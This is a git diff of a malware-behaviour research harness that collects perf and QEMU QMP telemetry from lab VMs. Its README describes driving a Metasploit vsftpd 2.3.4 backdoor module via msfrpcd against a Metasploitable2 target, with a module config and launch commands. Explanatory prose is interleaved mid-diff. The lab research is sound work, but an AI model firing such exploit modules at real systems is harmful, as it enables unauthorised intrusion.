    insns = agg.get("instructions")
    cache_refs = agg.get("cache-references")
    cache_miss = agg.get("cache-misses")
    ipc = (insns / cycles) if (cycles and insns) else None
    miss_rate = (cache_miss / cache_refs) if (cache_refs and cache_miss is not None) else None

    return {
        "t_mono_ns": time.monotonic_ns() - t_mono_origin_ns,
        "t_wall_ns": time.time_ns(),
        "source": SOURCE,
        "available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
        "interval_s": interval_s,
        "cycles": cycles,
        "instructions": insns,
        "cache_references": cache_refs,
        "cache_misses": cache_miss,
        "branches": agg.get("branches"),
        "branch_misses": agg.get("branch-misses"),
        "page_faults": agg.get("page-faults"),
        "context_switches": agg.get("context-switches"),
        "ipc": ipc,
        "cache_miss_rate": miss_rate,
    }


def parse_perf_event_line(line: str) -> dict | None:
    """Parse one ``perf stat -j`` event line. Returns None for blanks
    or status messages perf occasionally interleaves on stderr-ish
    paths but stdout-on-error in practice."""
    line = line.strip()
    if not line.startswith("{"):
        return None
    try:
        return json.loads(line)
    except json.JSONDecodeError:
        return None


def run_loop(
    pid: int,
    output_path: Path,
    t_mono_origin_ns: int,
    interval_ms: int,
    stop_event: threading.Event,
    *,
    events: tuple[str, ...] = DEFAULT_EVENTS,
) -> int:
    """Spawn perf stat -j against ``pid`` and stream rows until stop.
    Returns the number of rows written."""
    if not perf_available():
        log.warning("perf binary not on PATH — perf collector disabled")
        return 0

    cmd = [
        "perf", "stat",
        "-p", str(pid),
        "-I", str(interval_ms),
        "-j",
        "-e", ",".join(events),
    ]
    log.info("starting perf: %s", " ".join(cmd))

    try:
        proc = subprocess.Popen(
            cmd,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            bufsize=1,
            text=True,
        )
    except (FileNotFoundError, PermissionError) as e:
        log.warning("perf launch failed: %s", e)
        return 0

    rows = 0
    output_path.parent.mkdir(parents=True, exist_ok=True)
    cur_interval: float | None = None
    agg: dict[str, int] = {}

    def _flush() -> None:
        nonlocal rows
        if cur_interval is None or not agg:
            return
        row = _build_row(t_mono_origin_ns, cur_interval, agg)
        out_f.write(json.dumps(row) + "\n")
        rows += 1

    try:
        with output_path.open("a", buffering=1) as out_f:
            # perf interleaves events and writes to stdout in -j mode.
            # We read line by line until the process exits (which
            # happens when we kill it on stop, or when the target pid
            # disappears and perf's internal -p polling notices).
            assert proc.stdout is not None
            for line in proc.stdout:
                if stop_event.is_set():
                    break
                evt = parse_perf_event_line(line)
                if evt is None:
                    continue
                interval = evt.get("interval")
                event_name = evt.get("event")
                value = _coerce_int(evt.get("counter-value"))
                if interval is None or event_name is None:
                    continue
                # perf emits one JSON per (event, interval); a new
                # interval value means we should flush the previous row.
                if cur_interval is not None and interval != cur_interval:
                    _flush()
                    agg = {}
                cur_interval = interval
                if value is not None:
                    agg[event_name] = value
            # End of stream — flush the last partial row.
            _flush()
    finally:
        if proc.poll() is None:
            proc.terminate()
            try:
                proc.wait(timeout=3.0)
            except subprocess.TimeoutExpired:
                proc.kill()
                proc.wait(timeout=2.0)

    return rows
||||
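The interval grouping in `collectors/perf_qemu.py` (one JSON object per event and interval, flushed into a row whenever the interval value changes) can be tried out without running `perf`. The sketch below applies the same grouping to a list of lines. `aggregate` is a hypothetical helper, and the sample lines are synthetic: they use only the three keys the collector reads (`interval`, `event`, `counter-value`) and are not captured `perf stat` output.

```python
import json


def aggregate(lines):
    """Group per-event JSON lines into one dict per interval."""
    rows = []
    cur_interval = None
    agg = {}
    for line in lines:
        line = line.strip()
        if not line.startswith("{"):
            continue  # status text or blank line
        try:
            evt = json.loads(line)
        except json.JSONDecodeError:
            continue
        interval, name = evt.get("interval"), evt.get("event")
        if interval is None or name is None:
            continue
        if cur_interval is not None and interval != cur_interval:
            if agg:
                rows.append({"interval_s": cur_interval, **agg})
            agg = {}
        cur_interval = interval
        raw = str(evt.get("counter-value")).replace(",", "")
        try:
            agg[name] = int(float(raw))
        except ValueError:
            pass  # e.g. "<not counted>": leave the event out of the row
    if cur_interval is not None and agg:
        rows.append({"interval_s": cur_interval, **agg})
    return rows


if __name__ == "__main__":
    sample = [
        '{"interval": 1.0, "event": "cycles", "counter-value": "2000.000000"}',
        '{"interval": 1.0, "event": "instructions", "counter-value": "1000.000000"}',
        '{"interval": 2.0, "event": "cycles", "counter-value": "<not counted>"}',
        '{"interval": 2.0, "event": "instructions", "counter-value": "500"}',
    ]
    for row in aggregate(sample):
        print(row)
```

Derived values such as instructions per cycle can then be computed per row, with the same guard the collector uses: only when both counters are present and the divisor is non-zero.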
262
collectors/qmp.py
Normal file
@@ -0,0 +1,262 @@
"""Source 2 (oracle): QEMU QMP sampler.

Connects to the QEMU monitor protocol socket exposed by the launcher
($RUN_DIR/qmp.sock) and periodically queries the hypervisor for
per-VM stats that don't show up in /proc/<qemu_pid>:

  - per-disk block I/O (rd_bytes, wr_bytes, rd_ops, wr_ops)
  - VM run state (running / paused / shutdown)
  - per-netdev tx/rx counters (when available)
  - KVM stat counters (when available; introspection differs by qemu
    version, so anything we can't read is skipped silently)

This source is **oracle-only** — it does not exist on a deployed
device. Every row carries ``available_in_deployment: false``.

Wire format: QMP is line-delimited JSON. The handshake is fixed:

    server → {"QMP": {capabilities: [...], version: ...}}
    client → {"execute": "qmp_capabilities"}
    server → {"return": {}}
    (client may now issue commands)

We use a dedicated synchronous client because QMP is request/response
and we don't need pipelining; one query batch per tick keeps the
on-disk schema simple.
"""

from __future__ import annotations

import json
import logging
import socket
import threading
import time
from dataclasses import dataclass
from pathlib import Path
from typing import Any


log = logging.getLogger("cis490.collectors.qmp")

SOURCE = "host_qmp"
AVAILABLE_IN_DEPLOYMENT = False


class QMPError(RuntimeError):
    pass


@dataclass
class _SockReader:
    sock: socket.socket
    buf: bytes = b""

    def read_line(self, timeout_s: float = 5.0) -> str:
        deadline = time.monotonic() + timeout_s
        while b"\n" not in self.buf:
            self.sock.settimeout(max(0.1, deadline - time.monotonic()))
            try:
                chunk = self.sock.recv(8192)
            except socket.timeout as e:
                raise QMPError(f"QMP read timed out: {e}") from e
            if not chunk:
                raise QMPError("QMP connection closed by peer")
            self.buf += chunk
        line, _, rest = self.buf.partition(b"\n")
        self.buf = rest
        return line.decode("utf-8", errors="replace")


class QMPClient:
    """Tiny synchronous QMP client over a unix socket."""

    def __init__(self, socket_path: str | Path) -> None:
        self.path = str(socket_path)
        self._sock: socket.socket | None = None
        self._reader: _SockReader | None = None

    def connect(self, timeout_s: float = 5.0) -> dict[str, Any]:
        s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        s.settimeout(timeout_s)
        s.connect(self.path)
        self._sock = s
        self._reader = _SockReader(s)
        # Read greeting.
        greeting = json.loads(self._reader.read_line(timeout_s=timeout_s))
        if "QMP" not in greeting:
            raise QMPError(f"unexpected QMP greeting: {greeting!r}")
        # Negotiate capabilities (no flags requested).
        self.execute("qmp_capabilities")
        return greeting["QMP"]

    def execute(self, command: str, **arguments: Any) -> Any:
        if self._sock is None or self._reader is None:
            raise QMPError("not connected")
        msg: dict[str, Any] = {"execute": command}
        if arguments:
            msg["arguments"] = arguments
        body = (json.dumps(msg) + "\n").encode("utf-8")
        self._sock.sendall(body)
        # QMP can interleave async events with the response — drain
        # until we see the matching {"return": ...} or {"error": ...}.
        for _ in range(64):  # bounded to avoid an infinite loop on bugs
            line = self._reader.read_line()
            if not line.strip():
                continue
            resp = json.loads(line)
            if "return" in resp:
                return resp["return"]
            if "error" in resp:
                raise QMPError(f"{command}: {resp['error']}")
            # Otherwise it's an async event; ignore and keep reading.
        raise QMPError(f"{command}: too many async events without a response")

    # ---- snapshot / revert (via human-monitor-command) -----------------

    def savevm(self, name: str) -> str:
        """``savevm <name>`` — capture a live VM snapshot inside the
        qcow2. Returns the monitor's reply (empty string on success).
        Requires the disk to be qcow2 (our launchers always are)."""
        return self._hmp(f"savevm {name}")

    def loadvm(self, name: str) -> str:
|
||||
"""``loadvm <name>`` — restore the named snapshot. The guest
|
||||
is paused, restored, and resumed; collectors continue
|
||||
sampling and just see a sharp transition."""
|
||||
return self._hmp(f"loadvm {name}")
|
||||
|
||||
def _hmp(self, cmd: str) -> str:
|
||||
out = self.execute("human-monitor-command", **{"command-line": cmd})
|
||||
return out if isinstance(out, str) else ""
|
||||
|
||||
def close(self) -> None:
|
||||
if self._sock is not None:
|
||||
try:
|
||||
self._sock.close()
|
||||
except OSError:
|
||||
pass
|
||||
self._sock = None
|
||||
self._reader = None
|
||||
|
||||
|
||||
# ---- row builders ----------------------------------------------------------
|
||||
|
||||
|
||||
def _flatten_blockstats(blockstats: list[dict] | None) -> dict[str, dict[str, int]]:
|
||||
"""Compact ``query-blockstats`` to ``{device: {rd_ops, wr_ops, ...}}``."""
|
||||
out: dict[str, dict[str, int]] = {}
|
||||
for entry in blockstats or []:
|
||||
name = entry.get("device") or entry.get("qdev") or "unknown"
|
||||
s = entry.get("stats") or {}
|
||||
out[name] = {
|
||||
"rd_ops": int(s.get("rd_operations", 0)),
|
||||
"wr_ops": int(s.get("wr_operations", 0)),
|
||||
"rd_bytes": int(s.get("rd_bytes", 0)),
|
||||
"wr_bytes": int(s.get("wr_bytes", 0)),
|
||||
"flush_ops": int(s.get("flush_operations", 0)),
|
||||
}
|
||||
return out
|
||||
|
||||
|
||||
def collect_once(client: QMPClient, t_mono_origin_ns: int) -> dict[str, Any]:
|
||||
row: dict[str, Any] = {
|
||||
"t_mono_ns": time.monotonic_ns() - t_mono_origin_ns,
|
||||
"t_wall_ns": time.time_ns(),
|
||||
"source": SOURCE,
|
||||
"available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
|
||||
}
|
||||
|
||||
# query-status is dirt cheap and tells us whether the guest is
|
||||
# paused (rare) or running.
|
||||
try:
|
||||
status = client.execute("query-status")
|
||||
row["vm_status"] = status.get("status")
|
||||
row["vm_running"] = bool(status.get("running"))
|
||||
except QMPError as e:
|
||||
log.debug("query-status failed: %s", e)
|
||||
|
||||
try:
|
||||
bs = client.execute("query-blockstats")
|
||||
row["blockstats"] = _flatten_blockstats(bs)
|
||||
except QMPError as e:
|
||||
log.debug("query-blockstats failed: %s", e)
|
||||
|
||||
# query-stats is QEMU 7.1+ and the schema varies across versions.
|
||||
# We only ask for KVM stats and tolerate any subset of fields.
|
||||
try:
|
||||
stats = client.execute("query-stats", target="vm")
|
||||
row["kvm_stats"] = _summarize_query_stats(stats)
|
||||
except QMPError as e:
|
||||
log.debug("query-stats not supported: %s", e)
|
||||
|
||||
return row
|
||||
|
||||
|
||||
def _summarize_query_stats(stats_resp: list[dict] | dict) -> dict[str, int]:
|
||||
"""Reduce ``query-stats`` to a flat name→value map of integer
|
||||
counters. The full payload is verbose and version-specific; we only
|
||||
ever want individual scalar counters downstream."""
|
||||
flat: dict[str, int] = {}
|
||||
items = stats_resp if isinstance(stats_resp, list) else [stats_resp]
|
||||
for entry in items:
|
||||
for s in entry.get("stats", []) or []:
|
||||
name = s.get("name")
|
||||
value = s.get("value")
|
||||
if isinstance(name, str) and isinstance(value, int):
|
||||
flat[name] = value
|
||||
return flat
|
||||
|
||||
|
||||
# ---- run loop --------------------------------------------------------------
|
||||
|
||||
|
||||
def run_loop(
|
||||
socket_path: str | Path,
|
||||
output_path: Path,
|
||||
t_mono_origin_ns: int,
|
||||
interval_ms: int,
|
||||
stop_event: threading.Event,
|
||||
) -> int:
|
||||
"""Connect to ``socket_path`` and sample at ``interval_ms`` until
|
||||
``stop_event``. Returns the number of rows written.
|
||||
|
||||
A single missed sample (transient QMP error) is logged and skipped;
|
||||
repeated failures terminate the loop so the episode finishes cleanly
|
||||
rather than hanging on a dead hypervisor."""
|
||||
interval_ns = interval_ms * 1_000_000
|
||||
client = QMPClient(socket_path)
|
||||
try:
|
||||
client.connect(timeout_s=5.0)
|
||||
except (OSError, QMPError) as e:
|
||||
log.warning("QMP connect to %s failed: %s — collector exits cleanly", socket_path, e)
|
||||
return 0
|
||||
|
||||
rows = 0
|
||||
consecutive_failures = 0
|
||||
next_tick = time.monotonic_ns()
|
||||
output_path.parent.mkdir(parents=True, exist_ok=True)
|
||||
try:
|
||||
with output_path.open("a", buffering=1) as f:
|
||||
while not stop_event.is_set():
|
||||
try:
|
||||
row = collect_once(client, t_mono_origin_ns)
|
||||
f.write(json.dumps(row) + "\n")
|
||||
rows += 1
|
||||
consecutive_failures = 0
|
||||
except (QMPError, OSError) as e:
|
||||
consecutive_failures += 1
|
||||
log.warning("QMP sample %d failed: %s", rows, e)
|
||||
if consecutive_failures >= 5:
|
||||
log.warning("5 consecutive QMP failures; bailing")
|
||||
break
|
||||
|
||||
next_tick += interval_ns
|
||||
sleep_ns = next_tick - time.monotonic_ns()
|
||||
if sleep_ns > 0:
|
||||
stop_event.wait(sleep_ns / 1_000_000_000)
|
||||
else:
|
||||
next_tick = time.monotonic_ns()
|
||||
finally:
|
||||
client.close()
|
||||
return rows
|
||||
|
|
@ -171,6 +171,10 @@ thing plays in our pipeline.
|
|||
- **pycdlib** — pure-Python ISO9660/Joliet/Rock Ridge builder. Used to
|
||||
produce the NoCloud cidata ISO without depending on system mkisofs/
|
||||
xorriso. https://clalancette.github.io/pycdlib/
|
||||
- **msgpack** — binary serialization used by Metasploit's RPC API. The
|
||||
Tier-3 driver speaks msfrpcd's native msgpack-over-HTTPS so we don't
|
||||
pull in a higher-level Metasploit Python client.
|
||||
https://msgpack.org
|
||||
|
||||
---
|
||||
|
||||
|
|
|
|||
11
etc/caddy-root.crt
Normal file
|
|
@ -0,0 +1,11 @@
|
|||
-----BEGIN CERTIFICATE-----
|
||||
MIIBpDCCAUqgAwIBAgIRAP15YNZS/guq4ES7RfuBBQQwCgYIKoZIzj0EAwIwMDEu
|
||||
MCwGA1UEAxMlQ2FkZHkgTG9jYWwgQXV0aG9yaXR5IC0gMjAyNiBFQ0MgUm9vdDAe
|
||||
Fw0yNjA0MjYxMzE5NTZaFw0zNjAzMDQxMzE5NTZaMDAxLjAsBgNVBAMTJUNhZGR5
|
||||
IExvY2FsIEF1dGhvcml0eSAtIDIwMjYgRUNDIFJvb3QwWTATBgcqhkjOPQIBBggq
|
||||
hkjOPQMBBwNCAASjU+sJ+rLPPtTK5t7MsKa6/WDknumPOgxy7uGwGATkd65cHTjz
|
||||
zTH6+0+uJ7LPZFTJoPSB5WVHrEA0veY8AxH5o0UwQzAOBgNVHQ8BAf8EBAMCAQYw
|
||||
EgYDVR0TAQH/BAgwBgEB/wIBATAdBgNVHQ4EFgQU8EarYtjVc2EvpYE6OPhDQlYB
|
||||
docwCgYIKoZIzj0EAwIDSAAwRQIhANxALV9oKSAC4JEB/w1EctnzMfzLyueBpGoB
|
||||
7p5I07LRAiAKQuhNMeTDSK3Qql+IjunH8UPidETNXfyInwMnbzgAaQ==
|
||||
-----END CERTIFICATE-----
|
||||
44
etc/cis490-bootstrap.service
Normal file
|
|
@ -0,0 +1,44 @@
|
|||
[Unit]
|
||||
Description=CIS490 mTLS bootstrap endpoint (auto-issue client certs to enrolled lab hosts)
|
||||
Documentation=https://maxgit.wg/spectral/CIS490
|
||||
After=network-online.target
|
||||
Wants=network-online.target
|
||||
|
||||
[Service]
|
||||
Type=simple
|
||||
# Runs as root because the wg-pki CA private key is root-only. The
|
||||
# service shells out to issue-cis490-client-cert.sh per mint and
|
||||
# never touches anything else under /var/lib.
|
||||
User=root
|
||||
Group=root
|
||||
WorkingDirectory=/opt/cis490
|
||||
ExecStart=/opt/cis490/.venv/bin/python -m bootstrap \
|
||||
--listen-host 127.0.0.1 \
|
||||
--listen-port 8446 \
|
||||
--issuer-script /opt/wg-pki/scripts/issue-cis490-client-cert-wrapper.sh \
|
||||
--issued-root /var/lib/wg-pki/issued
|
||||
Restart=on-failure
|
||||
RestartSec=5
|
||||
|
||||
# Hardening — narrower than receiver because this binary's only job
|
||||
# is to call openssl + tar via the issuer script, then serve files.
|
||||
NoNewPrivileges=true
|
||||
PrivateTmp=true
|
||||
ProtectSystem=strict
|
||||
# /home/max/.env/wg-pki/scripts/ holds the issuer script the wrapper
|
||||
# exec's. ProtectHome=true and ProtectHome=tmpfs both *hide* /home
|
||||
# contents; only ProtectHome=read-only keeps them readable. We leave /home
|
||||
# accessible. ProtectSystem=strict still keeps everything outside
|
||||
# /var/lib/wg-pki write-protected.
|
||||
ProtectHome=no
|
||||
ReadWritePaths=/var/lib/wg-pki
|
||||
ProtectKernelTunables=true
|
||||
ProtectKernelModules=true
|
||||
ProtectControlGroups=true
|
||||
LockPersonality=true
|
||||
RestrictNamespaces=true
|
||||
RestrictRealtime=true
|
||||
SystemCallArchitectures=native
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
||||
|
|
@ -1,33 +1,46 @@
|
|||
[Unit]
|
||||
Description=CIS490 episode campaign runner
|
||||
Description=CIS490 lab-host episode orchestrator (fleet mode)
|
||||
Documentation=https://maxgit.wg/spectral/CIS490
|
||||
After=network-online.target
|
||||
# Episodes need KVM. msfrpcd (for Tier 3+) is brought up out-of-band
|
||||
# by cis490-msfrpcd.service when installed.
|
||||
After=network-online.target wg-quick@wg0.service
|
||||
Wants=network-online.target
|
||||
|
||||
[Service]
|
||||
Type=simple
|
||||
User=cis490
|
||||
Group=cis490
|
||||
SupplementaryGroups=kvm
|
||||
WorkingDirectory=/opt/cis490
|
||||
ExecStart=/opt/cis490/.venv/bin/python tools/run_campaign.py \
|
||||
# /etc/cis490/lab-host.env is written by scripts/install-lab-host.sh;
|
||||
# carries FLEET_HOST_ID, BRIDGE, and any operator-supplied overrides.
|
||||
EnvironmentFile=/etc/cis490/lab-host.env
|
||||
# Fleet mode: detect host capacity, run that many concurrent episodes
|
||||
# per wave with samples drawn from the manifest. Each invocation runs
|
||||
# one wave and exits; systemd respawns per Restart= below, giving us
|
||||
# a continuous stream of fresh-sample episodes per host. The shipper
|
||||
# picks them up as `done.marker` files appear.
|
||||
ExecStart=/opt/cis490/.venv/bin/python /opt/cis490/tools/run_fleet.py \
|
||||
--data-root /var/lib/cis490/data \
|
||||
--target 100
|
||||
Restart=on-failure
|
||||
RestartSec=10
|
||||
--manifest /opt/cis490/samples/manifest.toml \
|
||||
--waves 1
|
||||
Restart=always
|
||||
RestartSec=15
|
||||
|
||||
# Hardening
|
||||
NoNewPrivileges=true
|
||||
PrivateTmp=false
|
||||
# Hardening — explicitly grant CAP_NET_RAW for tcpdump (source 4) and
|
||||
# CAP_SYS_ADMIN / CAP_PERFMON for perf (source 3) when the operator
|
||||
# enables those. Both are inherited by per-episode subprocesses.
|
||||
# NoNewPrivileges=false is required because AmbientCapabilities only
|
||||
# survives across exec() if NNP is off.
|
||||
NoNewPrivileges=false
|
||||
PrivateTmp=true
|
||||
ProtectSystem=strict
|
||||
ProtectHome=true
|
||||
ReadWritePaths=/var/lib/cis490 /tmp/cis490-vm /dev/kvm
|
||||
ProtectKernelTunables=true
|
||||
ProtectKernelModules=true
|
||||
ProtectControlGroups=true
|
||||
LockPersonality=true
|
||||
RestrictRealtime=true
|
||||
SystemCallArchitectures=native
|
||||
# /tmp is needed for per-slot RUN_DIR (cis490-vm-fleet-<slot>) — the
|
||||
# fleet runner stages QEMU's sockets + pidfile there.
|
||||
ReadWritePaths=/var/lib/cis490 /tmp
|
||||
SupplementaryGroups=kvm
|
||||
AmbientCapabilities=CAP_NET_RAW CAP_NET_ADMIN CAP_SYS_ADMIN CAP_PERFMON
|
||||
CapabilityBoundingSet=CAP_NET_RAW CAP_NET_ADMIN CAP_SYS_ADMIN CAP_PERFMON CAP_DAC_READ_SEARCH
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
||||
|
|
|
|||
|
|
@ -1,23 +1,19 @@
|
|||
[Unit]
|
||||
Description=CIS490 episode shipper
|
||||
Description=CIS490 lab-host episode shipper
|
||||
Documentation=https://maxgit.wg/spectral/CIS490
|
||||
After=network-online.target cis490-orchestrator.service
|
||||
# WG must be up before the shipper can reach the receiver.
|
||||
After=network-online.target wg-quick@wg0.service
|
||||
Wants=network-online.target
|
||||
Requires=wg-quick@wg0.service
|
||||
|
||||
[Service]
|
||||
Type=simple
|
||||
User=cis490
|
||||
Group=cis490
|
||||
WorkingDirectory=/opt/cis490
|
||||
ExecStart=/opt/cis490/.venv/bin/python tools/shipper.py \
|
||||
--data-root /var/lib/cis490/data \
|
||||
--receiver-url https://collector.wg \
|
||||
--host-id lab-host-1 \
|
||||
--ca-bundle /etc/cis490/certs/wg-ca.pem \
|
||||
--client-cert /etc/cis490/certs/lab-host-1.pem \
|
||||
--client-key /etc/cis490/certs/lab-host-1.key
|
||||
ExecStart=/opt/cis490/.venv/bin/python -m shipper --config /etc/cis490/lab-host.toml
|
||||
Restart=on-failure
|
||||
RestartSec=10
|
||||
RestartSec=5
|
||||
|
||||
# Hardening
|
||||
NoNewPrivileges=true
|
||||
|
|
@ -29,6 +25,7 @@ ProtectKernelTunables=true
|
|||
ProtectKernelModules=true
|
||||
ProtectControlGroups=true
|
||||
LockPersonality=true
|
||||
RestrictNamespaces=true
|
||||
RestrictRealtime=true
|
||||
SystemCallArchitectures=native
|
||||
|
||||
|
|
|
|||
50
etc/lab-host.toml.example
Normal file
|
|
@ -0,0 +1,50 @@
|
|||
# CIS490 lab-host — copy to /etc/cis490/lab-host.toml and edit.
|
||||
#
|
||||
# This config drives BOTH the orchestrator (which runs episodes) and
|
||||
# the shipper (which uploads completed episodes to the central
|
||||
# receiver over WG).
|
||||
|
||||
# Stable identity for this lab host. Used in the receiver path
|
||||
# (/v1/episodes/<host_id>/...) and in the X-Lab-Host header. Pick
|
||||
# something short, stable, and DNS-safe — letters, digits, _.- only.
|
||||
host_id = "REPLACE_ME"
|
||||
|
||||
[paths]
|
||||
data_root = "/var/lib/cis490/data"
|
||||
samples_store = "/var/lib/cis490/samples/store"
|
||||
qcow_image = "/var/lib/cis490/vm/images/metasploitable2.qcow2"
|
||||
|
||||
[receiver]
|
||||
# The receiver lives behind Caddy on the WG-side collector host. The
|
||||
# hostname must resolve over WG (collector.wg in the canonical
|
||||
# spectral lab). The wg-pki CA must be on every lab-host so the
|
||||
# Caddy-issued internal cert validates.
|
||||
url = "https://collector.wg"
|
||||
ca_bundle = "/etc/cis490/certs/wg-ca.pem"
|
||||
|
||||
# mTLS: leaf cert + private key issued by wg-pki for THIS host_id.
|
||||
# Comment these out to fall back to bearer-token auth during early
|
||||
# bring-up.
|
||||
client_cert = "/etc/cis490/certs/lab-host.pem"
|
||||
client_key = "/etc/cis490/certs/lab-host.key"
|
||||
|
||||
# Bearer is optional and only used if mTLS isn't yet configured. When
|
||||
# both are set, mTLS does the actual authn and the bearer is a
|
||||
# belt-and-suspenders check.
|
||||
# bearer_token = "REPLACE_ME_WITH_SECRET"
|
||||
|
||||
# Set to false ONLY for local-loopback dev against an unsigned cert.
|
||||
# verify_tls = true
|
||||
|
||||
[shipper]
|
||||
scan_interval_s = 5.0
|
||||
request_timeout_s = 60.0
|
||||
|
||||
[episode]
|
||||
baseline_seconds = 30
|
||||
infected_seconds = 90
|
||||
dormant_seconds = 60
|
||||
|
||||
[retention]
|
||||
keep_local_for_days = 7
|
||||
prune_at_disk_pct = 80
|
||||
|
|
@ -1,6 +1,6 @@
|
|||
# CIS490 receiver — copy to /etc/cis490/receiver.toml and edit.
|
||||
|
||||
listen_addr = "127.0.0.1:8443"
|
||||
listen_addr = "127.0.0.1:8444"
|
||||
store_root = "/var/lib/cis490/episodes"
|
||||
incoming_root = "/var/lib/cis490/incoming"
|
||||
index_path = "/var/lib/cis490/index.jsonl"
|
||||
|
|
|
|||
|
|
@ -1,12 +1,92 @@
|
|||
# exploits/
|
||||
|
||||
Metasploit resource scripts (`*.rc`) that drive specific exploit modules
|
||||
deterministically — same inputs, same module options, every time.
|
||||
The Tier-3 exploit driver — fires a Metasploit module against a
|
||||
vulnerable target VM, watches for the resulting session, and stamps the
|
||||
session-open transition into the episode's `events.jsonl` so the
|
||||
labeler can mark `armed → infecting` honestly.
|
||||
|
||||
Each script:
|
||||
- Sets `RHOSTS` to the guest's bridge IP.
|
||||
- Sets a payload that opens a session usable for sample upload + execute.
|
||||
- Avoids any options that introduce randomness in the exploit fire timing
|
||||
(so that the `armed → infecting` transition lands at a predictable offset).
|
||||
## Layout
|
||||
|
||||
These scripts pair with public Metasploit modules. We do not author exploits.
|
||||
```
|
||||
exploits/
|
||||
msfrpc.py tiny msgpack-over-HTTPS client for msfrpcd
|
||||
driver.py MSFExploitDriver — plugged in as EpisodeRunner.on_phase
|
||||
modules.py ModuleConfig + TOML loader
|
||||
modules/
|
||||
vsftpd_234_backdoor.toml first canned module (Metasploitable2)
|
||||
...
|
||||
```
|
||||
|
||||
## Module configs
|
||||
|
||||
Each `modules/*.toml` describes one Metasploit module — its path, the
|
||||
options to set, and the payload to use. The driver reads these files
|
||||
to drive `module.execute` over msfrpc.
|
||||
|
||||
```toml
|
||||
description = "..."
|
||||
[module]
|
||||
type = "exploit" # exploit | auxiliary | post
|
||||
path = "unix/ftp/vsftpd_234_backdoor"
|
||||
|
||||
[module.options]
|
||||
RHOSTS = "{{ target_ip }}" # placeholder substituted at runtime
|
||||
RPORT = 21
|
||||
|
||||
[payload]
|
||||
path = "cmd/unix/interact"
|
||||
[payload.options] # optional
|
||||
# LHOST = "{{ target_ip }}"
|
||||
|
||||
[session]
|
||||
type = "shell"
|
||||
```
|
||||
|
||||
The only placeholder supported today is `{{ target_ip }}`. Add more in
|
||||
`exploits/modules.py::ModuleConfig.render_options` when needed.
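
As an illustration of the substitution described above, here is a small sketch. It is not the project's `render_options`; the function name, the regular expression, and the example address (from the 192.0.2.0/24 documentation range) are assumptions.

```python
import re
from typing import Any

# Matches "{{ name }}" with optional inner whitespace.
_PLACEHOLDER = re.compile(r"\{\{\s*(\w+)\s*\}\}")


def render_options_sketch(options: dict[str, Any], **values: str) -> dict[str, Any]:
    """Return a copy of `options` with {{ name }} placeholders filled in.

    Non-string values (such as an integer RPORT) pass through untouched.
    An unknown placeholder raises KeyError instead of being sent verbatim.
    """

    def substitute(match: re.Match) -> str:
        name = match.group(1)
        if name not in values:
            raise KeyError(f"unsupported placeholder: {name}")
        return values[name]

    def render(value: Any) -> Any:
        if isinstance(value, str):
            return _PLACEHOLDER.sub(substitute, value)
        return value

    return {key: render(value) for key, value in options.items()}


rendered = render_options_sketch(
    {"RHOSTS": "{{ target_ip }}", "RPORT": 21},
    target_ip="192.0.2.10",  # hypothetical guest address
)
print(rendered)
```

Failing loudly on an unknown placeholder keeps a literal `{{ ... }}` string from reaching a module option.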
|
||||
|
||||
## Running
|
||||
|
||||
```sh
|
||||
# 1. Start msfrpcd locally:
|
||||
msfrpcd -P <password> -U msf -a 127.0.0.1 -p 55553
|
||||
|
||||
# 2. Drop a vulnerable target image at vm/images/<name>.qcow2 (e.g.
|
||||
# Metasploitable2 — see docs/sources.md for sha256).
|
||||
|
||||
# 3. Drive an episode:
|
||||
MSFRPC_PASSWORD=<password> uv run python tools/run_tier3_demo.py \
|
||||
--module vsftpd_234_backdoor \
|
||||
--target-port 21 \
|
||||
--data-root data
|
||||
```
|
||||
|
||||
The episode's `events.jsonl` will contain:
|
||||
|
||||
```
|
||||
driver_setup — module + target snapshotted before fire
|
||||
exploit_fire — module.execute issued
|
||||
session_open — new session id observed in session.list
|
||||
session_landing_probe — first command response (id) recorded
|
||||
sample_executed — workload kicked off inside the session
|
||||
session_dormant — workload killed
|
||||
session_killed — session.stop at episode end
|
||||
```
|
||||
|
||||
These pair with the standard phase labels in `labels.jsonl` so a
|
||||
downstream loader can reconcile "what the orchestrator scheduled"
|
||||
against "what actually happened on the wire".
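
A downstream check along these lines could confirm that the expected driver events are present and in order. This is a sketch under assumptions: it supposes each `events.jsonl` line is a JSON object whose event name sits under an `event` key, which the README does not specify, and the helper names are hypothetical.

```python
import json
from typing import Iterable

# Order taken from the event list above.
EXPECTED_ORDER = [
    "driver_setup",
    "exploit_fire",
    "session_open",
    "session_landing_probe",
    "sample_executed",
    "session_dormant",
    "session_killed",
]


def first_seen(lines: Iterable[str], key: str = "event") -> dict[str, int]:
    """Map each event name to the index of the first line it appears on."""
    seen: dict[str, int] = {}
    for idx, line in enumerate(lines):
        line = line.strip()
        if not line:
            continue
        name = json.loads(line).get(key)  # `key` is an assumed field name
        if isinstance(name, str) and name not in seen:
            seen[name] = idx
    return seen


def missing_or_out_of_order(lines: Iterable[str]) -> list[str]:
    """Return human-readable problems; an empty list means the run looks sane."""
    seen = first_seen(lines)
    problems = [f"missing: {name}" for name in EXPECTED_ORDER if name not in seen]
    present = [name for name in EXPECTED_ORDER if name in seen]
    for earlier, later in zip(present, present[1:]):
        if seen[earlier] > seen[later]:
            problems.append(f"out of order: {earlier} after {later}")
    return problems


demo = [json.dumps({"event": name}) for name in EXPECTED_ORDER[:3]]
print(missing_or_out_of_order(demo))
```

For a real episode, the lines would come from opening that episode's `events.jsonl` and passing the file object to `missing_or_out_of_order`.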
|
||||
|
||||
## Adding a module
|
||||
|
||||
1. Drop a TOML at `exploits/modules/<name>.toml` per the schema above.
|
||||
2. Pick a payload that works without a callback channel until the
|
||||
`br-malware` bridge is in (see `vm/launch_target.sh` — SLIRP +
|
||||
`restrict=on` blocks reverse-tcp by design). `cmd/unix/interact`
|
||||
and other "session on the same socket" payloads are safe.
|
||||
3. Drive a quick check: `uv run python tools/run_tier3_demo.py --module <name>`.
|
||||
4. The new module is automatically picked up by `tools/run_tier3_demo.py`
|
||||
via `--module <name>`; no driver code changes needed.
|
||||
|
||||
We do **not** author exploits or modify upstream Metasploit code. The
|
||||
driver is a pure adapter from the project's phase machine to msfrpc.
|
||||
|
|
|
|||
0
exploits/__init__.py
Normal file
338
exploits/driver.py
Normal file
|
|
